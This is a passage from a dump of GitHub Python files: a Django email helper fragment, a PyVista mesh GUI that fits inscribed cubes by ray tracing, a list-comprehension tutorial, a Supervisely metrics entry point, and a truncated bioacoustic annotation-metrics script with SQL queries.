\n \"\"\"\n\n try:\n if eta is not None:\n send_mail(subject, message, sender_email, [recipient_email], eta=eta)\n else:\n send_mail(subject, message, sender_email, [recipient_email])\n\n except SMTPAuthenticationError:\n # Handle the authentication error here\n print(\"SMTP authentication error occurred.\")\n except Exception as e:\n # Print the exception and continue with other contests\n print(\"An error occurred while sending the reminder email.\", e)\n","repo_name":"samarth-shinde/CoCode_Backend","sub_path":"Backend/core/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8677559298","text":"import pyvista as pv\nimport sympy as sp\nfrom sympy import Matrix, lambdify\nimport numpy as np\nfrom PyQt5 import Qt, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\nfrom pyvistaqt import QtInteractor\nimport sys, os, time\nimport trimesh\n\n# initiate stored mesh\nmesh = pv.PolyData()\n\nclass MainWindow(Qt.QMainWindow):\n def __init__(self, parent=None, show=True):\n Qt.QMainWindow.__init__(self, parent)\n\n # create the frame\n self.frame = Qt.QFrame()\n vlayout = Qt.QVBoxLayout()\n\n # add the pyvista interactor object\n self.plotter = QtInteractor(self.frame)\n vlayout.addWidget(self.plotter.interactor)\n\n self.frame.setLayout(vlayout)\n self.setCentralWidget(self.frame)\n\n # simple menu\n mainMenu = self.menuBar()\n fileMenu = mainMenu.addMenu('File')\n editMenu = mainMenu.addMenu('Edit')\n \n # opening a mesh file\n self.open_mesh_action = Qt.QAction('Open Mesh...', self)\n self.open_mesh_action.triggered.connect(self.open_mesh)\n fileMenu.addAction(self.open_mesh_action)\n \n # exit button\n exitButton = Qt.QAction('Exit', self)\n exitButton.setShortcut('Ctrl+Q')\n exitButton.triggered.connect(self.close)\n fileMenu.addAction(exitButton)\n\n # create cubic skeleton\n self.cubic_skeleton_action = Qt.QAction('Cubic Skeleton', self)\n self.cubic_skeleton_action.triggered.connect(self.cubic_skeleton)\n editMenu.addAction(self.cubic_skeleton_action)\n\n # split mesh based on max cube faces\n # self.max_cube_slice_action = Qt.QAction('Slice27', self)\n # self.cubic_skeleton_action.triggered.connect(self.max_cube_slice)\n # editMenu.addAction(self.max_cube_slice_action)\n \n if show:\n self.show()\n\n self.plotter.add_axes(interactive=None, line_width=2, color=None, x_color=None, y_color=None, z_color=None, xlabel='X', ylabel='Y', zlabel='Z', labels_off=False, box=None, box_args=None)\n\n def open_mesh(self):\n \"\"\" add a mesh to the pyqt frame \"\"\"\n global mesh, mesh_vol\n\n # open file\n file_info = QtWidgets.QFileDialog.getOpenFileName()\n print(file_info)\n file_path = file_info[0]\n \n # determine file type and if conversion needed\n file_dir, file_name = os.path.split(file_path)\n mesh_name, mesh_type = os.path.splitext(file_name)\n\n # convert mesh file type\n #if ext != \".vtk\" or ext != \".VTK\":\n # mesh = meshio.read(file_path)\n # meshio.write(root + \".vtk\", mesh)\n # mesh = pv.read(head + \"/\" + root + \".vtk\")\n # need to store elsewhere or delete .vtk file in the future\n #else:\n # mesh = pv.read(file_path)\n\n # read mesh & transform according to principal axes\n pre = trimesh.load_mesh(file_path)\n orient = pre.principal_inertia_transform\n pre = pre.apply_transform(orient)\n pre.export('data/'+ mesh_name + '_oriented.STL')\n mesh = pv.read('data/'+ mesh_name + '_oriented.STL')\n\n # print mesh info\n print(\"Mesh Name:\", mesh_name)\n print(\"Mesh Type:\", mesh_type[1:])\n\n # show transformed mesh\n #self.plotter.add_mesh(mesh, show_edges=True, color=\"w\", opacity=0.6)\n\n # reset plotter\n self.reset_plotter()\n\n # find mesh centroid and translate the mesh so that's the origin\n self.centroid()\n\n # show bounding box\n # self.plotter.add_bounding_box(opacity=0.5, color=\"y\")\n\n # mesh volume\n mesh_vol = float(format(mesh.volume, \".5f\"))\n print(\"Mesh Volume:\", mesh_vol)\n\n def reset_plotter(self):\n \"\"\" clear plotter of mesh or interactive options \"\"\"\n # clear plotter\n self.plotter.clear()\n #self.plotter.clear_plane_widgets()\n #self.plotter.reset_camera()\n \n # callback opened mesh\n self.plotter.add_mesh(mesh, show_edges=True, color=\"w\", opacity=0.6)\n \n # show origin\n self.plotter.add_axes_at_origin(xlabel='X', ylabel='Y', zlabel='Z', line_width=6, labels_off=True)\n \n def centroid(self):\n \"\"\" find centroid volumetrically and indicate on graph \"\"\"\n global Vol_centroid, V\n\n # find the vertices & the vertex indices of each triangular face\n V = np.array(mesh.points)\n col = len(V)\n f_ind = np.array(mesh.faces.reshape((-1,4))[:, 1:4])\n \n # define an arbitrary start point from middle of max and min of X,Y,Z of\n # all points: in a convex manifold it falls inside the volume (requires\n # segmentation for general application)\n start = np.array(mesh.center)\n X_start = start[0]\n Y_start = start[1]\n Z_start = start[2]\n \n # initialize variables\n centroids = []\n Vol_total = 0\n Sum_vol_x = 0\n Sum_vol_y = 0\n Sum_vol_z = 0\n \n # find centroid from all tetrahedra made with arbitrary center and triangular faces\n for i in range(0, col-1, 3): \n # find the center of each tetrahedron (average of X,Y,Z of \n # 4 vertices, 3 from the triangle, and one arbitrary start point)\n X_cent = (X_start + V[f_ind[i,0],0] + V[f_ind[i+1,0],0] + V[f_ind[i+2,0],0]) / 4\n Y_cent = (Y_start + V[f_ind[i,1],1] + V[f_ind[i+1,1],1] + V[f_ind[i+2,1],1]) / 4\n Z_cent = (Z_start + V[f_ind[i,2],2] + V[f_ind[i+1,2],2] + V[f_ind[i+2,2],2]) / 4\n \n # compute the volume of each tetrahedron\n V1 = np.array([V[f_ind[i,0],0], V[f_ind[i,1],1], V[f_ind[i,2],2]])**2 - np.array([X_start, Y_start, Z_start])**2\n V2 = np.array([V[f_ind[i+1,0],0], V[f_ind[i+1,1],1], V[f_ind[i+1,2],2]])**2 - np.array([V[f_ind[i,0],0], V[f_ind[i,1],1], V[f_ind[i,2],2]])**2\n V3 = np.array([V[f_ind[i+2,0],0], V[f_ind[i+2,1],1], V[f_ind[i+2,2],2]])**2 - np.array([V[f_ind[i+1,0],0], V[f_ind[i+1,1],1], V[f_ind[i+1,2],2]])**2\n V1 = V1.reshape((-1,1))\n V2 = V2.reshape((-1,1))\n V3 = V3.reshape((-1,1))\n Vol = abs(np.linalg.det(np.hstack([V1, V2, V3]))) / 6\n \n # tally up each cycle\n Vol_total = Vol_total + Vol\n Sum_vol_x = Sum_vol_x + Vol * X_cent\n Sum_vol_y = Sum_vol_y + Vol * Y_cent\n Sum_vol_z = Sum_vol_z + Vol * Z_cent\n centroids.append([X_cent,Y_cent,Z_cent])\n \n # find & show centroid\n centroids = np.asarray(centroids)\n Vol_centroid = [Sum_vol_x, Sum_vol_y, Sum_vol_z] / Vol_total\n \n def cubic_skeleton(self):\n ''' fill mesh with cubic skeleton'''\n global max_cube_stored\n \n max_cube_stored = 0\n\n # user input number of rays for next cubes\n # self.plotter.add_text_slider_widget(self.max_cube_ray, ['10 rays','15 rays', '20 rays'], value=0)\n self.plotter.add_text_slider_widget(self.next_cubes_ray, ['10 rays','15 rays', '20 rays'], value=1)\n \n def max_cube_ray(self, value):\n \"\"\" add a maximally inscribed cube within the opened mesh (via ray tracing) \"\"\"\n global x_range, y_range, z_range, Vol_centroid\n global face_center, max_normal, max_cube_vol, max_cube\n global max_cube_start, max_cube_end, max_cube_run\n global top_rays, top_ints, bottom_rays, bottom_ints\n\n # bypass error\n try:\n top_rays, top_ints, bottom_rays, bottom_ints, max_cube, r_num, max_cube_stored\n except NameError:\n top_rays = None\n top_ints = None\n bottom_rays = None\n bottom_ints = None\n max_cube = None\n max_cube_stored = None\n r_num = 0\n\n # remove old rays\n if (r_num != 0) and (r_num == int(value[0])):\n return\n elif (r_num != 0) and (max_cube_stored != None):\n self.plotter.remove_actor(max_cube_stored)\n for i in range(0, r_num):\n self.plotter.remove_actor(top_rays[i])\n self.plotter.remove_actor(top_ints[i])\n self.plotter.remove_actor(bottom_rays[i])\n self.plotter.remove_actor(bottom_ints[i])\n\n # track starting time\n max_cube_start = time.time()\n\n # find mesh vertices\n V = np.array(mesh.points)\n\n # find the max and min of x,y,z axes of mesh\n ranges = mesh.bounds\n x_range = abs(ranges[0] - ranges[1])\n y_range = abs(ranges[2] - ranges[3])\n z_range = abs(ranges[4] - ranges[5])\n\n # show centroid\n Vol_centroid = np.array([0,0,0]) # overwrite centroid with origin at principle axes\n self.plotter.add_mesh(pv.PolyData(Vol_centroid), color='r', point_size=20.0, render_points_as_spheres=True)\n\n # find the nearest possible cube vertex from top rays & mesh intersection\n top_vert, top_rays, top_ints = self.cube_center_ray(Vol_centroid, 'z', value)\n top = self.furthest_pt(top_vert, Vol_centroid)\n\n # find the nearest possible cube vertex from bottom rays & mesh intersection\n bottom_vert, bottom_rays, bottom_ints = self.cube_center_ray(Vol_centroid, '-z', value)\n bottom = self.furthest_pt(bottom_vert, Vol_centroid)\n\n # find the nearest possible cube vertex between the two\n if top[0] < bottom[0]:\n p = top[1]\n V = top[2]\n else:\n p = bottom[1]\n V = bottom[2]\n \n # create and show max cube\n max_cube_V, max_cube_F, max_cube_vol = self.create_cube(V[p,:], Vol_centroid, np.array([0,0,Vol_centroid[2]]))\n max_cube = self.plotter.add_mesh(pv.PolyData(max_cube_V, max_cube_F), show_edges=True, line_width=3, color=\"g\", opacity=0.6)\n max_cube_stored = max_cube\n\n # find & show max cube face centers\n cell_center = pv.PolyData(max_cube_V, max_cube_F).cell_centers()\n face_center = np.array(cell_center.points)\n #self.plotter.add_mesh(cell_center, color=\"r\", point_size=8, render_points_as_spheres=True)\n\n # find max cube face normals\n max_normal = pv.PolyData(max_cube_V, max_cube_F).cell_normals\n\n # max cube volume\n max_cube_vol = float(format(max_cube_vol, \".5f\"))\n print(\"Max Cube Volume:\", max_cube_vol)\n\n # track ending time & duration\n max_cube_end = time.time()\n max_cube_run = max_cube_end - max_cube_start\n\n return\n\n def cube_center_ray(self, start, dir, value):\n ''' from starting point shoot out n rays to find vertices of possible cubes '''\n global r_num, r_rot, r_dec\n\n # initialize variables\n idx = value.index(\" \")\n r_num = 0\n for i in range(0, idx):\n r_num = r_num + int(value[i]) + (idx - i)**10\n r_rot = np.pi/2\n r_dec = -2*np.pi/r_num\n l_wid = 5\n pt_size = 20\n ray_size = np.zeros((4, 3))\n r_dir = ray_size\n r_dir_norm = ray_size\n r_end = ray_size\n rays = [0] * r_num\n ints = [0] * r_num\n r_int = []\n ori_r_int = []\n\n # set ray length\n r_len = np.sqrt((x_range/2)**2 + (y_range/2)**2 + (z_range/2)**2)\n \n # create rays by rotating the first, which creates the cube with xyz axes as its face normals\n for i in range(0, r_num):\n for j in range(0, 4):\n if (j == 0) and (dir == 'z'):\n r_dir[0] = np.array([np.sqrt(2)/2 * np.cos(np.pi/4 + r_dec * i), np.sqrt(2)/2 * np.sin(np.pi/4 + r_dec * i), 0.5])\n r_dir_norm[0] = r_dir[0] / np.linalg.norm(r_dir[0])\n r_end[0] = Vol_centroid + r_dir_norm[0] * r_len\n # set rotation matrix about 'z'\n R = self.rot_axis(np.array([0,0,1]))\n elif (j == 0) and (dir == '-z'):\n r_dir[0] = np.array([np.sqrt(2)/2 * np.cos(np.pi/4 + r_dec * i), np.sqrt(2)/2 * np.sin(np.pi/4 + r_dec * i), -0.5])\n r_dir_norm[0] = r_dir[0] / np.linalg.norm(r_dir[0])\n r_end[0] = Vol_centroid + r_dir_norm[0] * r_len\n # set rotation matrix about '-z'\n R = self.rot_axis(np.array([0,0,-1]))\n else:\n r_end[j] = np.dot(R(j*r_rot), (r_end[0]-Vol_centroid).T).T\n r_end[j] = r_end[j] + Vol_centroid\n\n # perform ray trace\n r_pts, r_ind = mesh.ray_trace(Vol_centroid, r_end[j])\n\n # show rays\n # rays[j] = self.plotter.add_mesh(pv.Line(Vol_centroid, r_end[j]), color='w', line_width=l_wid)\n # ints[j] = self.plotter.add_mesh(pv.PolyData(r_pts[0]), color='w', point_size=pt_size)\n\n # create an array of ray intersections\n r_int = np.append(r_int, r_pts[0])\n \n r_int = np.reshape(r_int, (4,3))\n ori_nearest, ori_p, ori_V = self.nearest_pt(r_int, Vol_centroid)\n r_int = []\n ori_r_int = np.append(ori_r_int, ori_V[ori_p,:])\n\n ori_r_int = np.reshape(ori_r_int, (r_num,3))\n return ori_r_int, rays, ints\n\n def nearest_pt(self, vert, starting_pt):\n \"\"\" find nearest vertex: for segmented convex manifold, a cube with volume centroid as \n center and nearest vertex as cube vertex, it falls inside the volume \"\"\"\n # find nearest point from the list of points\n c = len(vert)\n dist = np.zeros(c)\n for i in range(0, c):\n dist[i] = np.sqrt((vert[i,0] - starting_pt[0])**2 + (vert[i,1] - starting_pt[1])**2\n + (vert[i,2] - starting_pt[2])**2)\n \n # find index of the nearest point\n nearest = min(dist)\n p = np.where(dist == nearest)\n p = p[0].item()\n\n return nearest, p, vert\n\n def furthest_pt(self, vert, starting_pt):\n global p, furthest, dist\n \"\"\" find furthest vertex among the list of nearest vertices \"\"\"\n # find furthest point from the list of points\n c = len(vert)\n dist = np.zeros(c)\n for i in range(0, c):\n dist[i] = np.sqrt((vert[i,0] - starting_pt[0])**2 + (vert[i,1] - starting_pt[1])**2\n + (vert[i,2] - starting_pt[2])**2)\n\n # find index of the furthest point\n furthest = max(dist)\n p = np.where(dist == furthest)\n p = p[0][0]\n\n return furthest, p, vert\n\n def create_cube(self, vertex, starting_pt, axis):\n ''' create cube from the nearest pt & centroid '''\n if (axis[0] == 0) and (axis[1] == 0) and (axis[2] == 0):\n axis[2] = 1\n vert_trans = np.array([0,0,0])\n elif (starting_pt[0] == 0) and (starting_pt[1] == 0) and (starting_pt[2] == 0):\n vert_trans = np.array([0,0,0])\n else:\n vert_trans = starting_pt\n for i in range(0,3):\n if round(axis[i]) == 1 or round(axis[i]) == -1:\n vert_trans[i] == 0\n # find the other 7 vertices\n # 3 vertices can be found by rotating the first point 90 degrees 3 times around Z axis of centroid\n # 4 vertices can be found by translating the first four vertices twice the half edge\n # found from the distance times sin(pi/4)\n R = self.rot_axis(axis / np.linalg.norm(axis))\n \n # construct the array of the first 4 vertices\n V_1 = np.array(vertex - vert_trans)\n V_2 = np.dot(R(np.pi/2), V_1.T).T\n V_3 = np.dot(R(np.pi), V_1.T).T\n V_4 = np.dot(R(3*np.pi/2), V_1.T).T\n # cube_V_start = np.array([V_1, V_2, V_3, V_4])\n cube_V_start = np.array([V_1, V_2, V_3, V_4]) + np.ones((4,1)) * [vert_trans]\n cube_V_start_center = np.array(pv.PolyData(cube_V_start).center)\n\n # show nearest vertex of cube\n V_1 = np.array(vertex)\n self.plotter.add_mesh(pv.PolyData(V_1), color=\"y\", point_size=30.0, render_points_as_spheres=True)\n \n # find the translation distance\n trans_dis = starting_pt - cube_V_start_center\n trans_dir = trans_dis / np.linalg.norm(trans_dis)\n dia_dis = np.sqrt((V_1[0]-cube_V_start_center[0])**2 + (V_1[1]-cube_V_start_center[1])**2 + (V_1[2]-cube_V_start_center[2])**2)\n half_edge = np.ones((4,1)) * [trans_dir] * dia_dis * np.sin(np.pi/4)\n cube_trans = np.asarray(2*half_edge, dtype=np.float64)\n\n # construct the cube\n cube_V_end = np.add(cube_V_start, cube_trans)\n cube_V = np.vstack((cube_V_start, cube_V_end))\n cube_F = np.hstack([[4,0,1,2,3],\n [4,0,3,7,4],\n [4,0,1,5,4],\n [4,1,2,6,5],\n [4,2,3,7,6],\n [4,4,5,6,7]])\n\n # cube volume\n cube_vol = (2 * np.linalg.norm(half_edge[0,:]))**3\n\n return cube_V, cube_F, cube_vol\n\n def rot_axis(self, axis):\n ''' create a rotational matrix about an arbitrary axis '''\n t = sp.Symbol('t')\n\n R_t = Matrix([[sp.cos(t)+axis[0]**2*(1-sp.cos(t)), axis[0]*axis[1]*(1-sp.cos(t))-axis[2]*sp.sin(t), axis[0]*axis[2]*(1-sp.cos(t))+axis[1]*sp.sin(t)],\n [axis[1]*axis[0]*(1-sp.cos(t))+axis[2]*sp.sin(t), sp.cos(t)+axis[1]**2*(1-sp.cos(t)), axis[1]*axis[2]*(1-sp.cos(t))-axis[0]*sp.sin(t)],\n [axis[2]*axis[0]*(1-sp.cos(t))-axis[1]*sp.sin(t), axis[2]*axis[1]*(1-sp.cos(t))+axis[0]*sp.sin(t), sp.cos(t)+axis[2]**2*(1-sp.cos(t))]])\n R = lambdify(t, R_t)\n return R\n\n def next_cubes_ray(self, value):\n ''' create cubes within the mesh from the face centers of the first cube'''\n global next_cube_vol, max_normal\n global next_rays, next_ints, next_cubes\n\n # find max cube\n self.max_cube_ray(value)\n\n # # bypass error\n # try:\n # next_rays, next_ints, next_cubes, r_num\n # except NameError:\n # next_rays = None\n # next_ints = None\n # next_cubes = None\n # r_num = 0\n\n # # remove old rays\n # if (r_num != 0) and (r_num == int(value[0])):\n # return\n # elif (r_num != 0) and (next_cubes != None):\n # for i in range(0,6):\n # self.plotter.remove_actor(next_cubes[i])\n # for j in range(0, r_num):\n # self.plotter.remove_actor(next_rays[i*r_num+j])\n # self.plotter.remove_actor(next_ints[i*r_num+j])\n\n # track starting time\n next_cube_start = time.time()\n\n # initiate variables\n next_cube_vol_sum = 0\n next_cubes = [0] * 6\n next_rays = [0] * 6 * r_num\n next_ints = [0] * 6 * r_num\n \n # fix max_normal\n normal = face_center[0] - Vol_centroid\n if (np.sign(normal[2]) != np.sign(max_normal[0,2])):\n max_normal = np.negative(max_normal)\n\n # loop through all 6 faces of max cube\n for i in range(0, 6):\n # create rotaional matrix about max cube normals\n R = self.rot_axis(max_normal[i])\n\n # initialize variables\n ray_size = np.zeros((4, 3))\n r_dir = ray_size\n r_dir_norm = ray_size\n r_end = ray_size\n\n # initialize ray trace parameters\n l_wid = 3\n pt_size = 10\n r_len = np.sqrt((x_range/2)**2 + (y_range/2)**2 + (z_range/2)**2)\n r_int = []\n ori_r_int = []\n \n for j in range(0, r_num):\n for k in range(0, 4):\n if k == 0:\n if (i == 0) or (i == 5):\n r_dir[0] = np.array([np.sqrt(2)/2 * np.cos(np.pi/4 + r_dec * j), np.sqrt(2)/2 * np.sin(np.pi/4 + r_dec * j), max_normal[i][2]])\n else:\n x,y = sp.symbols('x,y')\n f = sp.Eq(max_normal[i][0]*x + max_normal[i][1]*y, 0)\n g = sp.Eq(x**2 + y**2, 0.5**2)\n inc = sp.solve([f,g],(x,y))\n r_dir[0] = np.array(max_normal[i] + [inc[0][0], inc[0][1], 0.5])\n r_dir_norm[0] = r_dir[0] / np.linalg.norm(r_dir[0])\n r_end[0] = face_center[i] + r_dir_norm[0] * r_len\n r_end[0] = np.dot(R(j*r_dec), (r_end[0]-Vol_centroid).T).T\n else:\n r_end[k] = np.dot(R(k*r_rot), (r_end[0]-Vol_centroid).T).T\n r_end[k] = r_end[k] + Vol_centroid\n\n # perform ray trace\n r_pts, r_ind = mesh.ray_trace(face_center[i], r_end[k])\n\n # show rays\n # next_rays[i*r_num+k] = self.plotter.add_mesh(pv.Line(face_center[i], r_end[k]), color='w', line_width=l_wid)\n # next_ints[i*r_num+k] = self.plotter.add_mesh(pv.PolyData(r_pts[0]), color='w', point_size=pt_size)\n\n # create an array of ray intersections\n r_int = np.append(r_int, r_pts[0])\n\n # find nearest vertice among the ray intersections\n r_int = np.reshape(r_int, (4,3))\n ori_nearest, ori_p, ori_V = self.nearest_pt(r_int, face_center[i])\n r_int = []\n ori_r_int = np.append(ori_r_int, ori_V[ori_p,:])\n\n ori_r_int = np.reshape(ori_r_int, (r_num,3))\n face = self.furthest_pt(ori_r_int, face_center[i])\n\n # create cube from nearest vertice\n next_cube_V, next_cube_F, next_cube_vol = self.create_cube(face[2][face[1],:], face_center[i], max_normal[i])\n next_cubes[i] = self.plotter.add_mesh(pv.PolyData(next_cube_V, next_cube_F), show_edges=True, line_width=3, color=\"g\", opacity=0.6)\n\n # next cube volume\n next_cube_vol_sum = next_cube_vol_sum + next_cube_vol\n\n # show packing efficiency\n next_cube_vol_sum = float(format(next_cube_vol_sum, \".5f\"))\n pack_vol = float(format((max_cube_vol + next_cube_vol_sum), \".5f\"))\n pack_percent = \"{:.1%}\".format(pack_vol / mesh_vol)\n print(\"Next Cubes Volume:\", next_cube_vol_sum)\n print(\"Packed Volume:\", pack_vol)\n print(\"Packing Efficiency:\", pack_percent)\n\n # track starting time\n next_cube_end = time.time()\n next_cube_run = next_cube_end - next_cube_start\n print(\"Total elapsed run time: %g seconds\" % (max_cube_run + next_cube_run))\n\n return\n \n def closeEvent(self, event):\n reply = QMessageBox.question(self, \"Window Close\", \"Are you sure you want to quit program?\",\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n \nif __name__ == '__main__':\n app = Qt.QApplication(sys.argv)\n window = MainWindow()\n window.show()\n window.setWindowTitle(\"Mesh Visualization\")\n QtWidgets.QApplication.setQuitOnLastWindowClosed(True)\n sys.exit(app.exec_())","repo_name":"bluejgw/Cube-Shell","sub_path":"Mesh_Gui_Lite.py","file_name":"Mesh_Gui_Lite.py","file_ext":"py","file_size_in_byte":23202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21472202778","text":"# #For ve while döngüsüne alternatif\n# numbers= []\n# for x in range(10):\n\n# numbers.append(x)\n# print(numbers)\n\n# numbers=[x for x in range(10)]\n# print(numbers) \n\n# numbers = [x*x for x in range(10) if x%3==0]\n# print(numbers)\n\n# MyString=\"Hello\"\n# mylist=[]\n\n# for letter in MyString:\n# mylist.append(letter)\n\n# mylist=[letter for letter in MyString]\n\n# print(mylist)\n\n# years=[1998,1999,2000,2001,2002,2003]\n# ages=[2022-year for year in years]\n# # yapmak istenen işlem-> döngü devamı\n# print(ages)\n\n\n\n\n# result=[x if x%2==0 else \"tek\" for x in range(5,100,5)]\n# print(result)\n\n# deneme=[a if a%3==0 else \"3e bölünemez\" for a in range(1,10)]\n# print(deneme)\n\n#bir şekilde atama yapılmaktadır\nresult =[]\n\nfor x in range(4):\n for y in range(3):\n result.append((x,y))\n print(x,y) \n#yukarıdaki örneğin farklı bir tür örneği yapılmaktadır.\nnumbers=[(x,y) for x in range(3) for y in range(3)]\nprint(numbers)\n \n","repo_name":"Fayikk/Work_To_Python","sub_path":"List_Comprehensions.py","file_name":"List_Comprehensions.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4693577838","text":"# coding: utf-8\n\nimport os\n\nimport supervisely_lib as sly\nfrom supervisely_lib.metric.classification_metrics import ClassificationMetrics\nfrom supervisely_lib.metric.common import check_tag_mapping, TAGS_MAPPING, CONFIDENCE_THRESHOLD\nfrom supervisely_lib.io.json import load_json_file\n\n\ndef main():\n settings = load_json_file(sly.TaskPaths.TASK_CONFIG_PATH)\n sly.logger.info('Input settings:', extra={'config': settings})\n\n metric = ClassificationMetrics(settings[TAGS_MAPPING], settings[CONFIDENCE_THRESHOLD])\n applier = sly.MetricProjectsApplier(metric, settings)\n check_tag_mapping(applier.project_gt, applier.project_pred, settings[TAGS_MAPPING])\n applier.run_evaluation()\n metric.log_total_metrics()\n\n\nif __name__ == '__main__':\n if os.getenv('DEBUG_LOG_TO_FILE', None):\n sly.add_default_logging_into_file(sly.logger, sly.TaskPaths.DEBUG_DIR)\n sly.main_wrapper('METRIC_EVALUATION', main)\n","repo_name":"juzisedefeimao/supervisely","sub_path":"plugins/metrics/classification_metrics/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18975199515","text":"from pathlib import Path\nfrom typing import Dict, List\nfrom tools.file_handling.collect import (\n CorespondingFiles,\n get_record_annoation_tupels_from_directory,\n)\nfrom pandas import read_csv, concat, DataFrame\nimport csv\nfrom tools.configuration import parse_config\n\nfrom mysql.connector.cursor import MySQLCursor\nfrom tools.logging import info\nfrom tools.db import (\n get_entry_id_or_create_it,\n connectToDB,\n)\nfrom numpy import median\n\nDATA_PATH = Path(\"libro_animalis/data/TD_Training\")\nREPORT_PATH = Path(\"./\")\nCONFIG_FILE_PATH = Path(\"libro_animalis/import_scripts/defaultConfig.cfg\")\nRECORD_MERGE_STRATEGY = \"replace\"\n\nQUERY_RECORD_COUNT = \"\"\"\n SELECT COUNT(*) FROM libro_animalis.record where collection_id = {collection_id}\n \"\"\"\nQUERY_RECORD_DURATION = \"\"\"\n SELECT sum(r.duration) as duration FROM record AS r\n WHERE r.collection_id = {collection_id}\n \"\"\"\n\nQUERY_ID_LEVEL_COUNT = \"\"\"\n SELECT\n latin_name,olaf8_id,german_name,english_name, COUNT(*) AS id_level\n FROM (annotation_of_species AS a)\n LEFT JOIN (record AS r) ON r.id = a.record_id\n LEFT JOIN species AS s ON s.id = a.species_id\n WHERE r.collection_id = {collection_id} and a.id_level = {id_level}\n GROUP BY a.species_id\n order by `id_level` DESC\n \"\"\"\n\nQUERY_VOCALIZATIOM_TYPE_COUNT = \"\"\"\n SELECT\n latin_name,olaf8_id,german_name,english_name, vocalization_type, COUNT(*) AS count\n FROM (annotation_of_species AS a)\n LEFT JOIN (record AS r) ON r.id = a.record_id\n LEFT JOIN species AS s ON s.id = a.species_id\n WHERE r.collection_id = {collection_id} and a.id_level = {id_level} \n GROUP BY a.species_id, a.vocalization_type\n order by `latin_name`,vocalization_type DESC\n \"\"\"\nQUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS = \"\"\"\n SELECT SUM(a.end_time - a.start_time) AS duration\n FROM libro_animalis.annotation_of_species AS a\n LEFT JOIN (record AS r) ON r.id = a.record_id\n WHERE r.collection_id = {collection_id} AND a.id_level = {id_level} \n \"\"\"\n\nQUERY__ID_LEVEL_ANOTATIONS_COUNT = \"\"\"SELECT count(*) \n FROM libro_animalis.annotation_of_species as a\n LEFT JOIN (record AS r) ON r.id = a.record_id\n WHERE r.collection_id = {collection_id} AND\n a.id_level = {id_level} \n \"\"\"\nQUERY_ANNOTATION_INTERVALL_DURATION = \"\"\"\n SELECT (a.end_time - a.start_time) as duration FROM libro_animalis.annotation_interval as a\n\t LEFT JOIN (record AS r) ON r.id = a.record_id\n\t WHERE r.collection_id = {collection_id}\n\"\"\"\nQUERY_ANNOTATION_INTERVALL_COUNT = \"\"\"\n SELECT COUNT(*) as count FROM libro_animalis.annotation_interval as a\n\t LEFT JOIN (record AS r) ON r.id = a.record_id\n\t WHERE r.collection_id = {collection_id}\n\"\"\"\n\n\ndef list_to_csv(data: list, file_path: Path, head_row: List[str]):\n with open(file_path, \"w\") as out:\n csv_out = csv.writer(out)\n csv_out.writerow(head_row)\n for row in data:\n csv_out.writerow(row)\n\n\ndef add_filename(data_frame: DataFrame, filename: str) -> DataFrame:\n # data_frame.assign(filename=filename)\n data_frame[\"filename\"] = data_frame.apply(lambda x: filename, axis=1)\n tmp = data_frame[\"filename\"]\n data_frame.drop(labels=[\"filename\"], axis=1, inplace=True)\n data_frame.insert(0, \"filename\", tmp)\n return data_frame.copy(deep=True)\n\n\ndef create_merged_raven_files(list_of_files: List[CorespondingFiles]):\n\n annotations = list(\n map(\n lambda x: add_filename(\n read_csv(\n open(x.annoation_file, \"rb\"),\n delimiter=\"\\t\",\n encoding=\"unicode_escape\",\n ),\n x.audio_file.name,\n ),\n list_of_files,\n ),\n )\n result = concat(annotations)\n return result\n\n\ndef merge_species_lists(dict, id_level_species_count_list, key):\n for entry in id_level_species_count_list:\n\n if entry[0] not in dict:\n dict[entry[0]] = {\n \"names\": list(entry[0:4]),\n key: entry[4],\n }\n else:\n dict[entry[0]][key] = entry[4]\n return dict\n\n\ndef create_metrics(\n data_path=None,\n report_path=None,\n config_path=None,\n missing_species=None,\n collectionId=None,\n):\n config = parse_config(config_path)\n\n list_of_files = get_record_annoation_tupels_from_directory(\n data_path,\n record_file_ending=config.files.record_file_ending,\n annoation_file_ending=config.files.annoation_file_ending,\n )\n\n # check if all filenames are valid\n # info(\"Merging files\")\n all_data = create_merged_raven_files(list_of_files)\n\n # write merged raven file\n all_data.to_csv(\n report_path.joinpath(\"merged_raven_annoations.txt\"), sep=\"\\t\",\n )\n\n annotated_segments = all_data.query(\n \"SpeciesCode == 'TD_Start_End' & Channel == 1\"\n ).shape[0]\n\n sound_signals_total = all_data.query(\n 'SpeciesCode != \"TD_Start_End\" & SpeciesCode != \"BACKGROUND\" & Channel == 1'\n ).SpeciesCode.shape[0]\n\n clicks_count = all_data.query(\n 'SpeciesCode == \"ABAR_Click\" & Channel == 4'\n ).SpeciesCode.shape[0]\n\n info(\"Start querieng database\")\n with connectToDB(config.database) as db_connection:\n # start import files\n with db_connection.cursor() as db_cursor:\n db_cursor: MySQLCursor\n # -- id_level_1_species_count\n db_cursor.execute(\n QUERY_ID_LEVEL_COUNT.format(collection_id=collectionId, id_level=1)\n )\n id_level_1_species_count = list(db_cursor.fetchall())\n # -- id_level_2_species_count\n db_cursor.execute(\n QUERY_ID_LEVEL_COUNT.format(collection_id=collectionId, id_level=2)\n )\n id_level_2_species_count = list(db_cursor.fetchall())\n # -- id_level_3_species_count\n db_cursor.execute(\n QUERY_ID_LEVEL_COUNT.format(collection_id=collectionId, id_level=3)\n )\n id_level_3_species_count = list(db_cursor.fetchall())\n\n dict = merge_species_lists({}, id_level_1_species_count, \"id_1\")\n dict = merge_species_lists(dict, id_level_2_species_count, \"id_2\")\n dict = merge_species_lists(dict, id_level_3_species_count, \"id_3\")\n\n id_level_species_count = []\n\n for species in dict:\n id_level_species_count.append(\n dict[species][\"names\"]\n + [\n dict[species][\"id_1\"] if \"id_1\" in dict[species] else 0,\n dict[species][\"id_2\"] if \"id_2\" in dict[species] else 0,\n dict[species][\"id_3\"] if 